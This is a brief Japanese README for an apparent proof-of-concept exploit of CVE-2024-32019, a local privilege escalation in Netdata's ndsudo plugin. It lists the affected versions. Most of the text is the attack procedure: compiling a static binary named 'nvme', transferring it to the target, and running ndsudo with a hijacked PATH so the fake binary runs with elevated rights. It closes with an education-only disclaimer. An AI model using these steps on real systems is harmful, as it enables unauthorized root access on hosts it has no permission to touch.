
CVE-2024-32019の概念実証エクスプロイトで、Netdataのndsudoプラグインにおける信頼されない検索パスを介したローカル権限昇格を示します。コンパイル手順とデプロイ手順を含みます。
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo の信頼されていない検索パスを介したローカル権限昇格
x86_64-linux-gnu-gcc -o nvme exploit.c -static
コンパイルしたバイナリを脆弱なマシンに転送します。
実行可能にします:
chmod +x nvme
PATH 操作を介して脆弱なバイナリをエクスプロイトします(バイナリをアップロードした同じパスを使用):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
この概念実証(PoC)コードは、教育および許可された侵入テスト目的のみで提供されます。